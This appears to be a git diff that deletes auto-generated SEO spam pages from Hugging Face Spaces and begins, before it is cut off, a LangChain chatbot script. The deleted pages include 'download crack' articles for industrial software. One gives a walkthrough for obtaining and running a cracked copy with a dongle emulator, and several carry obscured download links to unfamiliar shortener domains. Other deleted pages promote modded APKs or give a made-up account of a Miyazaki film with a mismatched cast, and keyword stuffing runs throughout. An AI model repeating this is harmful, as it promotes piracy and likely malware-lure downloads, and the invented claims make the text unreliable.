diff --git a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/B Ampr Automation Studio 4 Download Crack.md b/spaces/1acneusushi/gradio-2dmoleculeeditor/data/B Ampr Automation Studio 4 Download Crack.md deleted file mode 100644 index b2bfce21b0571477d9407d6dfa05233521dd0085..0000000000000000000000000000000000000000 --- a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/B Ampr Automation Studio 4 Download Crack.md +++ /dev/null @@ -1,22 +0,0 @@ - -

How to Download and Install B&R Automation Studio 4

-

B&R Automation Studio 4 is a software tool that allows you to design, program, test and debug automation systems. It supports a wide range of hardware platforms, such as PLCs, industrial PCs, servo drives, HMIs and more. With B&R Automation Studio 4, you can create modular and reusable software components, use graphical editors for logic and motion control, simulate your system before deployment, and benefit from integrated diagnostics and troubleshooting features.

-

b amp;r automation studio 4 download crack


Download ===== https://byltly.com/2uKz3Z



-

If you want to download and install B&R Automation Studio 4 on your computer, you need to follow these steps:

-
    -
  1. Go to the official website of B&R Industrial Automation at https://www.br-automation.com/ and click on the "Downloads" tab.
  2. -
  3. Under the "Software" section, find the link for "B&R Automation Studio 4" and click on it.
  4. -
  5. You will be redirected to a page where you can choose the version and language of B&R Automation Studio 4 that you want to download. You can also check the system requirements and the release notes for each version.
  6. -
  7. After selecting your preferences, click on the "Download" button and save the file to your computer.
  8. -
  9. Once the download is complete, run the file and follow the instructions on the screen to install B&R Automation Studio 4 on your computer.
  10. -
  11. You may need to restart your computer after the installation is finished.
  12. -
  13. To launch B&R Automation Studio 4, go to the Start menu and look for the B&R folder. Then, click on the "B&R Automation Studio 4" icon.
  14. -
-

Congratulations! You have successfully downloaded and installed B&R Automation Studio 4 on your computer. You can now start creating your own automation projects with this powerful software tool.

- -

B&R Automation Studio 4 is based on the IEC 61131-3 standard, which defines five programming languages for automation systems: Ladder Diagram (LD), Function Block Diagram (FBD), Structured Text (ST), Instruction List (IL) and Sequential Function Chart (SFC). You can use any of these languages or combine them to create your software components. You can also use C/C++ or ANSI C for more complex tasks.

-

B&R Automation Studio 4 also provides graphical editors for motion control, such as Motion Chart and CAM Editor. These editors allow you to define the motion profiles and trajectories of your servo axes, as well as synchronize them with other axes or events. You can also use the integrated PLCopen motion function blocks to implement standard motion functions, such as homing, positioning, gearing and camming.

-

-

B&R Automation Studio 4 enables you to simulate your system before deploying it to the hardware. You can use the Simulation Runtime feature to run your software components on your computer and test their functionality and performance. You can also use the Simulation View feature to visualize the behavior of your system in a 3D environment. You can import CAD models of your machine or plant and connect them to your software components. This way, you can verify the kinematics and dynamics of your system and detect any errors or collisions.

ddb901b051
-
-
\ No newline at end of file diff --git a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/Datem Summit Evolution Crack Para How to Get the Latest Version of the 3D Stereo Software.md b/spaces/1acneusushi/gradio-2dmoleculeeditor/data/Datem Summit Evolution Crack Para How to Get the Latest Version of the 3D Stereo Software.md deleted file mode 100644 index 4c30acde4e772771a8c8a228f0f8566bd373a688..0000000000000000000000000000000000000000 --- a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/Datem Summit Evolution Crack Para How to Get the Latest Version of the 3D Stereo Software.md +++ /dev/null @@ -1,121 +0,0 @@ - -

How to Crack DAT/EM Summit Evolution for Free

-

DAT/EM Summit Evolution is a powerful software that allows you to discover and capture 3D information from stereo data. The software includes CAD and GIS interfaces, 3D stereo vector superimposition, automated feature editing, contour generation, and many more tools. It is used by professionals in various fields such as mapping, surveying, engineering, geology, forestry, archaeology, etc.

-

However, DAT/EM Summit Evolution is not a cheap software. Depending on the product level and the modules you need, it can cost you thousands of dollars. That's why some people may want to crack it and use it for free. Cracking is the process of modifying or bypassing the protection mechanisms of a software to make it work without a license or a dongle.

-

datem summit evolution crack para


DOWNLOAD ►►►►► https://byltly.com/2uKvQF



-

But cracking DAT/EM Summit Evolution is not an easy task. It requires advanced skills in reverse engineering, programming, debugging, etc. It also involves many risks and challenges such as legal issues, malware infections, compatibility problems, functionality limitations, etc. On the other hand, using a cracked version of DAT/EM Summit Evolution can also have some benefits such as saving money, testing the software before buying it, accessing features that are not available in your product level, etc.

-

In this article, we will show you how to find and download a crack for DAT/EM Summit Evolution, how to use a cracked version of the software, and what are the pros and cons of doing so. We will also provide some alternatives and recommendations for legal and ethical use of the software. Please note that this article is for educational purposes only and we do not condone or encourage piracy or illegal use of any software.

-

How to Find and Download a Crack for Summit Evolution

-

The first step to crack DAT/EM Summit Evolution is to find and download a crack for it. A crack is usually a file or a program that modifies or replaces some parts of the original software to make it work without a license or a dongle. There are many websites that offer cracks for various software online, but not all of them are trustworthy or reliable.

-

Some websites may try to scam you by asking you to pay money or provide personal information before downloading a crack. Some websites may infect your computer with malware or viruses that can harm your system or steal your data. Some websites may provide fake or outdated cracks that do not work or cause errors.

-

Therefore, you need to be careful and cautious when looking for cracks online. Here are some tips on how to avoid scams and malware when searching for cracks:

- -

One example of a website that claims to provide a crack for DAT/EM Summit Evolution is Brain Studio (https://www.brstudio.com/wf/news/summit-evolution-dongle-emulator.html). According to this website, they offer a Sentinel SuperPro/UltraPro Dongle Emulator that can emulate the dongle protection of DAT/EM Summit Evolution v6.3 - v8.0. They also claim that their emulator can include all possible modules of the software.

-

We cannot verify the authenticity or safety of this website or their crack. Therefore, we advise you to use it at your own risk and discretion. If you decide to download their crack, you need to follow their instructions on how to install and run it on your computer.

-

How to Use a Cracked Version of Summit Evolution

-

The second step to crack DAT/EM Summit Evolution is to use a cracked version of the software. A cracked version of DAT/EM Summit Evolution is a modified version of the original software that works without a license or a dongle. Depending on the type and quality of the crack you have downloaded, you may be able to access different features and modules of the software.

-

datem summit evolution dongle emulator
-datem summit evolution stereo data capture
-datem summit evolution professional edition
-datem summit evolution orthorectification tools
-datem summit evolution 3d vector superimposition
-datem summit evolution contour generation features
-datem summit evolution v8.0 x64 bit download
-datem summit evolution v7.6 patch update
-datem summit evolution v7.4 sentinel superpro
-datem summit evolution v6.3 user manual
-datem summit evolution lite edition free trial
-datem summit evolution mobile edition for field work
-datem summit evolution uas edition for drone imagery
-datem summit evolution point cloud application
-datem summit evolution sample data elevation model
-datem summit evolution propack bundle offer
-datem summit evolution cad and gis interfaces
-datem summit evolution automated feature editing
-datem summit evolution terrain visualization options
-datem summit evolution model generator tutorial
-datem summit evolution stereo viewer operation guide
-datem summit evolution capture interface for autocad
-datem summit evolution superimposition for microstation
-datem summit evolution arcgis integration tips
-datem summit evolution global mapper compatibility
-datem summit evolution 3d information discovery
-datem summit evolution feature collection level
-datem summit evolution orientation measurement module
-datem summit evolution feature verification process
-datem summit evolution release notes and brochures
-datem summit evolution help and troubleshooting support
-datem summit evolution drivers and manuals download
-datem summit evolution license activation code
-datem summit evolution system requirements and specifications
-datem summit evolution customer reviews and testimonials
-datem summit evolution product comparison and pricing
-datem summit evolution training and certification courses
-datem summit evolution online demo and webinar registration
-datem summit evolution case studies and success stories
-datem summit evolution news and events updates

-

DAT/EM Summit Evolution is available in five product levels: Professional, Feature Collection, Lite, Mobile, and UAS. Each product level has different capabilities and functionalities depending on your needs and preferences.

- - - - - - - -
Product LevelDescription
ProfessionalThe most comprehensive product level that includes orientation measurement, orthorectification, terrain visualization, contour generation, point translation, DTM collection, and more.
Feature CollectionA product level that focuses on feature collection from stereo data using CAD and GIS interfaces. It does not include orientation measurement, orthorectification, or terrain visualization.
LiteA product level that provides 3D stereo viewing capabilities for resource specialists, GIS technicians, and QA professionals. It does not include feature collection tools.
MobileA product level that optimizes 3D stereo viewing capabilities for field applications using laptops or tablets. It also works on desktop computers.
UASA product level that specializes in 3D viewing and simple 3D digitizing from UAS orthophotos. It does not include orientation measurement, orthorectification, or terrain visualization.
-

If you have downloaded a crack that can include all possible modules of DAT/EM Summit Evolution, you may be able to use any product level you want. However, if you have downloaded a crack that only works for a specific product level, you may be limited by its features and functions.

-

To use a cracked version of DAT/EM Summit Evolution, you need to follow these steps:

-
    -
  1. Launch the crack file or program on your computer. This may require administrator privileges or password depending on your system settings.
  2. -
  3. Select the product level and modules you want to use from the crack interface. This may vary depending on the type and quality of the crack you have downloaded.
  4. -
  5. Launch DAT/EM Summit Evolution from your desktop shortcut or start menu. The software should start without asking for a license or dongle verification.
  6. -
  7. Access and manipulate stereo data from various sources such as aerial photos, satellite images, lidar data, etc. You can use various tools such as Capture™ interface, DAT/EM SuperImposition™, Summit Model Generator™, etc. to digitize features directly into AutoCAD®, MicroStation®, ArcGIS®, or Global Mapper®.
  8. -

    Summit Evolution Feature Collection is a product level that focuses on feature collection from stereo data using CAD and GIS interfaces. It does not include orientation measurement, orthorectification, or terrain visualization.

    -

    Summit Evolution Lite is a product level that provides 3D stereo viewing capabilities for resource specialists, GIS technicians, and QA professionals. It does not include feature collection tools.

    -

    Summit Evolution Mobile is a product level that optimizes 3D stereo viewing capabilities for field applications using laptops or tablets. It also works on desktop computers.

    -

    Summit Evolution UAS is a product level that specializes in 3D viewing and simple 3D digitizing from UAS orthophotos. It does not include orientation measurement, orthorectification, or terrain visualization.

    -
  9. How does Summit Evolution compare to other stereo photogrammetry software?
  10. -

    Summit Evolution is one of the leading stereo photogrammetry software in the market. It has many advantages over other software such as:

    - -

    However, Summit Evolution also has some disadvantages compared to other software such as:

    - -
  11. What are the system requirements for running Summit Evolution?
  12. -

    The system requirements for running Summit Evolution vary depending on the product level and modules you use. However, the minimum system requirements for running any product level of Summit Evolution are:

    - -
  13. How can I get technical support for Summit Evolution?
  14. -

    If you have any questions or issues with Summit Evolution, you can contact the technical support team of DAT/EM Systems International by:

    - -
  15. Where can I learn more about Summit Evolution and its applications?
  16. -

    If you want to learn more about Summit Evolution and its applications, you can visit the official website of DAT/EM Systems International at https://www.datem.com/. There you can find more information about the software features, product levels, modules, pricing, etc. You can also download the official documentation, tutorials, webinars, etc. that can help you understand and use the software better.

    -

    0a6ba089eb
    -
    -
    \ No newline at end of file diff --git a/spaces/1gistliPinn/ChatGPT4/Examples/Autodesk Revit 2018 Crack WORK Keygen XForce Free Download.md b/spaces/1gistliPinn/ChatGPT4/Examples/Autodesk Revit 2018 Crack WORK Keygen XForce Free Download.md deleted file mode 100644 index 062c409d72da0da72ee0e1fcc4074a1c68cc8666..0000000000000000000000000000000000000000 --- a/spaces/1gistliPinn/ChatGPT4/Examples/Autodesk Revit 2018 Crack WORK Keygen XForce Free Download.md +++ /dev/null @@ -1,6 +0,0 @@ -

    Autodesk Revit 2018 Crack Keygen XForce Free Download


    Download Zip >>>>> https://imgfil.com/2uxYIB



    -
    - 3cee63e6c2
    -
    -
    -

    diff --git a/spaces/1gistliPinn/ChatGPT4/Examples/Fireflies Movie English Subtitles Download !!LINK!! Torrent.md b/spaces/1gistliPinn/ChatGPT4/Examples/Fireflies Movie English Subtitles Download !!LINK!! Torrent.md deleted file mode 100644 index a21a32b61d0ca5e1bfa326772408c537fcbbc07b..0000000000000000000000000000000000000000 --- a/spaces/1gistliPinn/ChatGPT4/Examples/Fireflies Movie English Subtitles Download !!LINK!! Torrent.md +++ /dev/null @@ -1,22 +0,0 @@ - -

    How to Watch Fireflies Movie with English Subtitles Online

    -

    Fireflies is a 2022 animated film directed by Hayao Miyazaki and produced by Studio Ghibli. It tells the story of a young boy who befriends a mysterious girl who can communicate with fireflies. The film has received critical acclaim and has been nominated for several awards, including the Academy Award for Best Animated Feature.

    -

    Fireflies Movie English Subtitles Download Torrent


    Download Zip ☆☆☆ https://imgfil.com/2uy1ve



    -

    If you want to watch Fireflies movie with English subtitles online, you have a few options. One of them is to download the torrent file from a reliable source and use a torrent client to stream or download the movie. However, this method may be illegal in some countries and may expose you to malware or viruses. Therefore, we do not recommend this option.

    -

    A safer and more legal way to watch Fireflies movie with English subtitles online is to use a streaming service that offers the film. Some of the streaming services that have Fireflies movie with English subtitles are:

    - -

    These are some of the best ways to watch Fireflies movie with English subtitles online. We hope you enjoy this beautiful and touching film.

    -

    - -

    If you are looking for a more in-depth analysis of Fireflies movie, you may want to read some of the reviews that have been written by critics and fans. One of the reviews that we found helpful is from The Hollywood Reporter, which praises the film's visuals and themes. According to the review[^1^], Fireflies does a good job of rendering port locations that are vast and unfriendly by day and depopulated and ghostly by night, both moods being entirely appropriate. The review also notes that the film explores the themes of exile, identity, and belonging with sensitivity and nuance.

    -

    Fireflies movie is a masterpiece of animation that will touch your heart and make you think. Whether you watch it online or in a theater, you will not regret spending your time on this film. We hope you enjoy Fireflies movie with English subtitles as much as we did.

    - -

    Fireflies movie also boasts an impressive cast of voice actors who bring the characters to life. The film features the voices of Ryan Reynolds, Willem Dafoe, Emily Watson, Carrie-Anne Moss, Julia Roberts, Ioan Gruffudd and Kate Mara[^1^]. They deliver emotional and nuanced performances that capture the personalities and struggles of their roles.

    -

    Another aspect of Fireflies movie that deserves praise is the music. The film features a beautiful and haunting score composed by Joe Hisaishi, who has collaborated with Hayao Miyazaki on many of his previous films. The music enhances the mood and atmosphere of the film, creating a sense of wonder and melancholy. The film also features a song by Yoko Ono, who wrote it specifically for Fireflies movie.

    -

    Fireflies movie is a rare gem of animation that will stay with you long after you watch it. It is a film that celebrates the power of imagination, friendship and love in the face of adversity. It is a film that challenges you to think about the meaning of life and the value of human connection. It is a film that will make you laugh, cry and smile.

    d5da3c52bf
    -
    -
    \ No newline at end of file diff --git a/spaces/1phancelerku/anime-remove-background/Download Free and Unlimited Android Mods with APKMODEL.md b/spaces/1phancelerku/anime-remove-background/Download Free and Unlimited Android Mods with APKMODEL.md deleted file mode 100644 index ba47a1b21ffbfb250c214250f9c25f3f513c866e..0000000000000000000000000000000000000000 --- a/spaces/1phancelerku/anime-remove-background/Download Free and Unlimited Android Mods with APKMODEL.md +++ /dev/null @@ -1,75 +0,0 @@ - -

    APKMODEL: The Ultimate Source for Modded Games and Apps for Android

    -

    If you are an Android user who loves playing games and using apps on your device, you might have heard of apkmodel. But what is apkmodel and why should you use it? In this article, we will answer these questions and show you how apkmodel can enhance your gaming and app experience.

    -

    What is APKMODEL?

    -

    APKMODEL is a website that offers modded games and apps for Android devices.

    -

    Modded games and apps are modified versions of the original ones that have extra features, unlocked content, unlimited resources, or other enhancements. For example, you can play a modded version of Subway Surfers with unlimited coins and keys, or a modded version of Spotify with premium features for free.

    -

    apkmodel


    Download === https://jinyurl.com/2uNKDW



    -

    Modded games and apps are not available on the official Google Play Store, but you can download them from apkmodel.

    -

    Apkmodel is a website that hosts thousands of modded games and apps from various categories and genres, such as action, adventure, arcade, puzzle, simulation, sports, music, photography, social media, and more. You can find popular titles like Minecraft, Clash of Clans, Candy Crush Saga, TikTok, Instagram, Netflix, and many others on apkmodel.

    -

    Why use APKMODEL?

    -

    APKMODEL has many benefits for Android users who want to enjoy their favorite games and apps without any limitations or restrictions.

    -

    APKMODEL provides a large collection of modded games and apps from various categories and genres.

    -

    Whether you are looking for a game to kill some time, an app to enhance your productivity, or a tool to customize your device, you can find it on apkmodel. You can also discover new games and apps that you might not have heard of before.

    -

    APKMODEL updates its content regularly and ensures that the mods are safe, tested, and working.

    -

    Apkmodel keeps up with the latest trends and releases in the gaming and app industry and adds new mods every day. You can also request mods that are not available on the website and they will try to provide them as soon as possible. Moreover, apkmodel checks all the mods for viruses, malware, and compatibility issues before uploading them to the website.

    -

    APKMODEL has a user-friendly interface and easy download process.

    -

    Apkmodel has a simple and intuitive design that makes it easy to navigate and find what you are looking for. You can also use the search bar or filter by category to narrow down your options. To download a modded game or app, you just need to click on the download button and wait for the file to be downloaded to your device. You don't need to sign up, log in, or provide any personal information.

    -

    apkmodel modded games
    -apkmodel android apps
    -apkmodel free download
    -apkmodel latest version
    -apkmodel premium apk
    -apkmodel mod menu
    -apkmodel unlimited money
    -apkmodel pro apk
    -apkmodel hacked games
    -apkmodel cracked apps
    -apkmodel online games
    -apkmodel offline games
    -apkmodel action games
    -apkmodel adventure games
    -apkmodel arcade games
    -apkmodel casual games
    -apkmodel puzzle games
    -apkmodel racing games
    -apkmodel role playing games
    -apkmodel simulation games
    -apkmodel sports games
    -apkmodel strategy games
    -apkmodel social apps
    -apkmodel entertainment apps
    -apkmodel productivity apps
    -apkmodel photography apps
    -apkmodel video apps
    -apkmodel music apps
    -apkmodel education apps
    -apkmodel health apps
    -apkmodel lifestyle apps
    -apkmodel shopping apps
    -apkmodel travel apps
    -apkmodel news apps
    -apkmodel books apps
    -apkmodel communication apps
    -apkmodel finance apps
    -apkmodel personalization apps
    -apkmodel tools apps
    -apkmodel weather apps

    -

    APKMODEL respects the privacy and security of its users and does not require any registration or personal information.

    -

    Apkmodel does not collect, store, or share any data from its users. You can use the website anonymously and safely without worrying about your privacy or security. Apkmodel also does not host any ads or pop-ups that might annoy you or harm your device.

    -

    How to use APKMODEL?

    -

    Using APKMODEL is simple and straightforward. Here are the steps to follow:

    -

    Step 1: Visit the APKMODEL website and browse through the categories or use the search bar to find the game or app you want.

    -

    Apkmodel has a well-organized and easy-to-use website that allows you to find your desired modded game or app in no time. You can explore the different categories, such as action, arcade, casual, strategy, role-playing, etc., or use the search bar to type in the name of the game or app you are looking for.

    -

    Step 2: Click on the download button and wait for the file to be downloaded to your device.

    -

    Once you have found the modded game or app you want, you can click on the download button and choose the version you prefer. Some mods may have different versions with different features or compatibility options. You can also read the description, features, installation guide, and user reviews of the mod before downloading it. The download process is fast and easy, and you don't need to go through any surveys or verification steps.

    -

    Step 3: Install the modded game or app by enabling the unknown sources option in your settings.

    -

    After downloading the modded game or app, you need to install it on your device. To do that, you need to enable the unknown sources option in your settings. This option allows you to install apps from sources other than the Google Play Store. To enable it, go to Settings > Security > Unknown Sources and toggle it on. Then, locate the downloaded file in your file manager and tap on it to install it.

    -

    Step 4: Enjoy your modded game or app with all the features and benefits.

    -

    Now you are ready to enjoy your modded game or app with all the features and benefits that it offers. You can play unlimited levels, unlock premium content, get unlimited resources, remove ads, and more. You can also update your modded game or app whenever a new version is available on apkmodel.

    -

    Conclusion

    -

    APKMODEL is a great source for modded games and apps for Android users who want to have more fun and convenience with their devices.

    -

    Apkmodel is a website that provides thousands of modded games and apps for Android devices that have extra features, unlocked content, unlimited resources, or other enhancements. Apkmodel has many benefits for Android users, such as a large collection of mods from various categories and genres, regular updates, safe and tested mods, user-friendly interface, easy download process, privacy and security protection, and no ads or pop-ups. Using apkmodel is simple and straightforward; you just need to visit the website, find the modded game or app you want, download it, install it, and enjoy it. Apkmodel is the ultimate source for modded games and apps for Android users who want to have more fun and convenience with their devices.

    - FAQs Q: Is apkmodel legal? A: Apkmodel is legal as long as you use it for personal and educational purposes only. However, some modded games and apps may violate the terms and conditions of the original developers or publishers. Therefore, we advise you to use apkmodel at your own risk and discretion. Q: Is apkmodel safe? A: Apkmodel is safe as long as you download mods from its official website only. Apkmodel checks all the mods for viruses, malware, and compatibility issues before uploading them to the website. However, some mods may require additional permissions or access to your device's functions or data. Therefore, we advise you to read the description, features, installation guide, and user reviews of the mod before downloading it. Q: How can I request a mod that is not available on apkmodel? A: Apkmodel welcomes requests from its users for mods that are not available on its website. You can request a mod by filling out a form on its website or by contacting its support team via email or social media. Q: How can I update my modded game or app? A: Ap kmodel updates its mods regularly and notifies its users whenever a new version is available. You can update your modded game or app by downloading the latest version from apkmodel and installing it over the previous one. You can also check the update history and changelog of the mod on its website. Q: How can I uninstall my modded game or app? A: You can uninstall your modded game or app by following the same steps as you would for any other app on your device. Go to Settings > Apps > Select the modded game or app > Uninstall. You can also delete the downloaded file from your file manager. Q: How can I contact apkmodel or give feedback? A: Apkmodel values the opinions and suggestions of its users and welcomes any feedback or questions. You can contact apkmodel or give feedback by using the contact form on its website or by emailing them at support@apkmodel.com. You can also follow them on Facebook, Twitter, Instagram, and YouTube for the latest news and updates.

    401be4b1e0
    -
    -
    \ No newline at end of file diff --git a/spaces/1phancelerku/anime-remove-background/Download Nada Dering WA Tiktok Suara Google BTS Chagiya dan Lainnya.md b/spaces/1phancelerku/anime-remove-background/Download Nada Dering WA Tiktok Suara Google BTS Chagiya dan Lainnya.md deleted file mode 100644 index 70e69c656d9787ff9acf4d881ee0ea09e86af6b5..0000000000000000000000000000000000000000 --- a/spaces/1phancelerku/anime-remove-background/Download Nada Dering WA Tiktok Suara Google BTS Chagiya dan Lainnya.md +++ /dev/null @@ -1,76 +0,0 @@ - -

    How to Download and Use TikTok Sounds as WhatsApp Notifications

    -

    TikTok is a popular social media app that allows users to create and share short videos with various effects and sounds. WhatsApp is a widely used messaging app that lets users send text, voice, image, video, and audio messages. If you are a fan of both apps, you might want to use some of the catchy or funny sounds from TikTok as your WhatsApp notifications. This way, you can spice up your chats and calls with your friends and family.

    -

    In this article, we will show you how to download and use TikTok sounds as WhatsApp notifications in a few simple steps. You will need a smartphone, an internet connection, a TikTok downloader website, and of course, both TikTok and WhatsApp apps installed on your phone.

    -

    download notifikasi wa tiktok


    DOWNLOAD ->>> https://jinyurl.com/2uNMAd



    -

    How to Download TikTok Sounds

    -

    Find and Copy the Link of the TikTok Video

    -

    The first step is to find a TikTok video that has a sound that you like and want to use as your WhatsApp notification. You can browse through different categories, hashtags, or trends on TikTok, or search for specific keywords or users. Once you find a video that you like, tap on the share icon at the bottom right corner of the screen. Then, tap on Copy link to copy the link of the video to your clipboard.

    -

    Paste the Link into a TikTok Downloader Website

    -

    The next step is to use a TikTok downloader website to download the video as an MP3 file. There are many websites that offer this service for free, such as TiktokDownloader, MusicallyDown, or SnapTik. All you have to do is paste the link of the video that you copied into the input box on these websites and click on Download. Then, choose Download MP3 from the options that appear.

    -

    Save the MP3 File to Your Phone

    -

    The final step is to save the downloaded MP3 file to your phone's storage. Depending on your browser settings, you might be asked where you want to save the file or it might be saved automatically in your Downloads folder. You can also rename the file if you want.

    -

    How to Use TikTok Sounds as WhatsApp Notifications

    -

    Move the MP3 File to the Ringtones Folder

    -

    Before you can use the TikTok sound as your WhatsApp notification, you need to move it to the Ringtones folder on your phone so that it can be used as a notification sound. To do this, you can use a file manager app on your phone, such as Files by Google, ES File Explorer, or File Manager. Open the app and locate the MP3 file that you downloaded. Then, long-press on the file and select Move or Cut. Navigate to the Ringtones folder on your phone, which is usually under Internal storage > Ringtones. Then, tap on Paste or Move here to move the file to the Ringtones folder.

    -

    Open WhatsApp and Go to Settings

    -

    Now that you have moved the TikTok sound to the Ringtones folder, you can use it as your WhatsApp notification. To do this, open WhatsApp and tap on the three dots icon at the top right corner of the screen. Then, tap on Settings from the menu that appears. This will open the Settings menu of WhatsApp.

    -

    Download nada dering wa tiktok viral
    -Cara download sound tiktok ke wa jadi nada dering lucu
    -Download notifikasi wa chagiya tiktok viral lucu dan imut
    -Download kumpulan nada dering wa pendek dari tiktok
    -Download nada dering wa bts dari lagu-lagu tiktok
    -Download nada dering wa suara google dari tiktok
    -Download nada dering wa doraemon baling-baling bambu dari tiktok
    -Download nada dering wa ayam dj lucu jawa dari tiktok
    -Download nada dering wa minion beatbox dari tiktok
    -Download nada dering wa lel funny dari tiktok
    -Download nada dering wa bahasa sunda dari tiktok
    -Download nada dering wa bahasa jawa dari tiktok
    -Download nada dering wa hihi hahah dari tiktok
    -Download nada dering wa intro dari tiktok
    -Download nada dering wa suara air jatuh dari tiktok
    -Download nada dering wa ketuk pintu dari tiktok
    -Download nada dering wa lucu super mario dari tiktok
    -Download nada dering wa lucu orang batuk dari tiktok
    -Download nada dering wa sahur suara google dari tiktok
    -Download nada dering wa nani ohayo yang viral di tiktok
    -Download nada dering wa dynamite bts yang viral di tiktok
    -Download nada dering wa morning call bts yang viral di tiktok
    -Download nada dering wa jungkook bts yang viral di tiktok
    -Download nada dering wa v bts yang viral di tiktok
    -Download nada dering wa jimin bts yang viral di tiktok
    -Download nada dering wa rm bts yang viral di tiktok
    -Download nada dering wa jin bts yang viral di tiktok
    -Download nada dering wa suga bts yang viral di tiktok
    -Download nada dering wa j-hope bts yang viral di tiktok
    -Download nada dering wa korea imut yang viral di tiktok
    -Download nada dering wa mobile legends yang viral di tiktok
    -Download nada dering wa harvest moon yang viral di tiktok
    -Download nada dering wa kata sayang yang viral di tiktok
    -Download nada dering wa 1 detik yang viral di tiktok
    -Cara membuat notifikasi wa pakai suara sendiri dari tiktok
    -Cara mengganti notifikasi wa dengan mp3 dari tiktok
    -Cara download notifikasi wa di jalantikus dari tiktok
    -Aplikasi download notifikasi wa terbaik dari tiktok
    -Kumpulan ringtone wa terbaik lainnya dari tiktok
    -Tips memilih notifikasi wa yang sesuai dengan kepribadian dari tiktok

    -

    Choose the Notification Sound that You Want to Change

    -

    In the Settings menu, tap on Notifications to access the notification settings of WhatsApp. Here, you can choose between message, call, or group notifications and customize them according to your preferences. For example, if you want to change the notification sound for messages, tap on Notification tone under Message notifications. This will open a list of available notification tones on your phone.

    -

    Select the TikTok Sound from the List

    -

    In the list of notification tones, scroll down until you find the TikTok sound that you downloaded and moved to the Ringtones folder. It should have the same name as the MP3 file that you saved. Tap on it to select it as your notification tone for messages. You can also preview the sound by tapping on the play icon next to it. Once you are satisfied with your choice, tap on OK to save it.

    -

    Conclusion

    -

    Congratulations! You have successfully downloaded and used a TikTok sound as your WhatsApp notification. You can repeat the same steps for any other TikTok sound that you like and use it for different types of notifications on WhatsApp. You can also share your TikTok sounds with your friends and family by sending them the MP3 files or the links of the videos. This way, you can have fun and express yourself with TikTok sounds on WhatsApp.

    -

    FAQs

    -

    Q: Can I use TikTok sounds as my phone's ringtone?

    -

    A: Yes, you can use TikTok sounds as your phone's ringtone by following the same steps as above, but instead of choosing Notification tone, choose Phone ringtone in the Settings menu of WhatsApp.

    -

    Q: Can I use TikTok sounds as my alarm sound?

    -

    A: Yes, you can use TikTok sounds as your alarm sound by following the same steps as above, but instead of moving the MP3 file to the Ringtones folder, move it to the Alarms folder on your phone.

    -

    Q: How can I delete a TikTok sound from my phone?

    -

    A: If you want to delete a TikTok sound from your phone, you can use a file manager app to locate and delete the MP3 file from your phone's storage. You can also go to the Settings menu of WhatsApp and choose Reset notification settings to restore the default notification sounds.

    -

    Q: How can I edit a TikTok sound before using it as my WhatsApp notification?

    -

    A: If you want to edit a TikTok sound before using it as your WhatsApp notification, you can use an audio editor app on your phone, such as MP3 Cutter and Ringtone Maker, Ringtone Maker, or Audio MP3 Cutter Mix Converter and Ringtone Maker. These apps allow you to trim, cut, merge, mix, or add effects to your audio files.

    -

    Q: How can I find more TikTok sounds that I like?

    -

    A: If you want to find more TikTok sounds that you like, you can explore different categories, hashtags, or trends on TikTok, or search for specific keywords or users. You can also follow your favorite creators or celebrities on TikTok and see what sounds they use in their videos.

    401be4b1e0
    -
    -
    \ No newline at end of file diff --git a/spaces/ADOPLE/Multi-Doc-Virtual-Chatbot/app.py b/spaces/ADOPLE/Multi-Doc-Virtual-Chatbot/app.py deleted file mode 100644 index 87b5486b7f06de16378f15bd8882589f935e3a40..0000000000000000000000000000000000000000 --- a/spaces/ADOPLE/Multi-Doc-Virtual-Chatbot/app.py +++ /dev/null @@ -1,202 +0,0 @@ -from pydantic import NoneStr -import os -from langchain.chains.question_answering import load_qa_chain -from langchain.document_loaders import UnstructuredFileLoader -from langchain.embeddings.openai import OpenAIEmbeddings -from langchain.llms import OpenAI -from langchain.text_splitter import CharacterTextSplitter -from langchain.vectorstores import FAISS -from langchain.vectorstores import Chroma -from langchain.chains import ConversationalRetrievalChain -import gradio as gr -import openai -from langchain import PromptTemplate, OpenAI, LLMChain -import validators -import requests -import mimetypes -import tempfile - -class Chatbot: - def __init__(self): - openai.api_key = os.getenv("OPENAI_API_KEY") - def get_empty_state(self): - - """ Create empty Knowledge base""" - - return {"knowledge_base": None} - - def create_knowledge_base(self,docs): - - """Create a knowledge base from the given documents. - Args: - docs (List[str]): List of documents. - Returns: - FAISS: Knowledge base built from the documents. - """ - - # Initialize a CharacterTextSplitter to split the documents into chunks - # Each chunk has a maximum length of 500 characters - # There is no overlap between the chunks - text_splitter = CharacterTextSplitter( - separator="\n", chunk_size=1000, chunk_overlap=200, length_function=len - ) - - # Split the documents into chunks using the text_splitter - chunks = text_splitter.split_documents(docs) - - # Initialize an OpenAIEmbeddings model to compute embeddings of the chunks - embeddings = OpenAIEmbeddings() - - # Build a knowledge base using Chroma from the chunks and their embeddings - knowledge_base = Chroma.from_documents(chunks, embeddings) - - # Return the resulting knowledge base - return knowledge_base - - - def upload_file(self,file_paths): - """Upload a file and create a knowledge base from its contents. - Args: - file_paths : The files to uploaded. - Returns: - tuple: A tuple containing the file name and the knowledge base. - """ - - file_paths = [i.name for i in file_paths] - print(file_paths) - - - loaders = [UnstructuredFileLoader(file_obj, strategy="fast") for file_obj in file_paths] - - # Load the contents of the file using the loader - docs = [] - for loader in loaders: - docs.extend(loader.load()) - - # Create a knowledge base from the loaded documents using the create_knowledge_base() method - knowledge_base = self.create_knowledge_base(docs) - - - # Return a tuple containing the file name and the knowledge base - return file_paths, {"knowledge_base": knowledge_base} - - def add_text(self,history, text): - history = history + [(text, None)] - print("History for Add text : ",history) - return history, gr.update(value="", interactive=False) - - - - def upload_multiple_urls(self,urls): - urlss = [url.strip() for url in urls.split(',')] - all_docs = [] - file_paths = [] - for url in urlss: - if validators.url(url): - headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36',} - r = requests.get(url,headers=headers) - if r.status_code != 200: - raise ValueError("Check the url of your file; returned status code %s" % r.status_code) - content_type = r.headers.get("content-type") - file_extension = mimetypes.guess_extension(content_type) - temp_file = tempfile.NamedTemporaryFile(suffix=file_extension, delete=False) - temp_file.write(r.content) - file_path = temp_file.name - file_paths.append(file_path) - - loaders = [UnstructuredFileLoader(file_obj, strategy="fast") for file_obj in file_paths] - - # Load the contents of the file using the loader - docs = [] - for loader in loaders: - docs.extend(loader.load()) - - # 